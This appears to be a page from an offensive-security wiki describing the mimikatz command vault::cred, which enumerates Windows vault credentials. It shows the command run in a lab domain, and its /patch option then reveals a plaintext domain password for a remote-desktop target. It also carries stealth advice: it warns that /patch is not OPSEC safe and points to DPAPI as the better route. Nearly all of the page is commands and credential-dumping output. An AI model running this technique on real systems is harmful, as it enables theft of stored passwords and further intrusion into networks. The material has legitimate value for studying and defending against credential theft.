Links

cred

vault::cred enumerates vault credentials. More information can be found at Benjamin's guide howto-~-scheduled-tasks-credentials. It has the following command line argument:
  • /patch: according to Benjamin this option must be avoided as it is not OPSEC safe and DPAPI is a better solution
mimikatz # vault::cred
TargetName : TERMSRV/192.168.0.224 / <NULL>
UserName : hacklab\m3g9tr0n
Comment : <NULL>
Type : 2 - domain_password
Persist : 2 - local_machine
Flags : 00000000
Credential :
Attributes : 0
TargetName : Domain:target=TERMSRV/192.168.0.224 / <NULL>
UserName : hacklab\m3g9tr0n
Comment : <NULL>
Type : 2 - domain_password
Persist : 2 - local_machine
Flags : 00000000
Credential :
Attributes : 0
TargetName : WindowsLive:target=virtualapp/didlogical / <NULL>
UserName : 02ihgxxcusaapvlp
Comment : PersistedCredential
Type : 1 - generic
Persist : 2 - local_machine
Flags : 00000000
Credential :
Attributes : 32
mimikatz # vault::cred /patch
TargetName : TERMSRV/192.168.0.224 / <NULL>
UserName : hacklab\m3g9tr0n
Comment : <NULL>
Type : 2 - domain_password
Persist : 2 - local_machine
Flags : 00000000
Credential : Suoer_SecretPass1!
Attributes : 0
TargetName : Domain:target=TERMSRV/192.168.0.224 / <NULL>
UserName : hacklab\m3g9tr0n
Comment : <NULL>
Type : 2 - domain_password
Persist : 2 - local_machine
Flags : 00000000
Credential : Suoer_SecretPass1!
Attributes : 0
TargetName : WindowsLive:target=virtualapp/didlogical / <NULL>
UserName : 02ihgxxcusaapvlp
Comment : PersistedCredential
Type : 1 - generic
Persist : 2 - local_machine
Flags : 00000000
Credential :
Attributes : 32
Last modified 11mo ago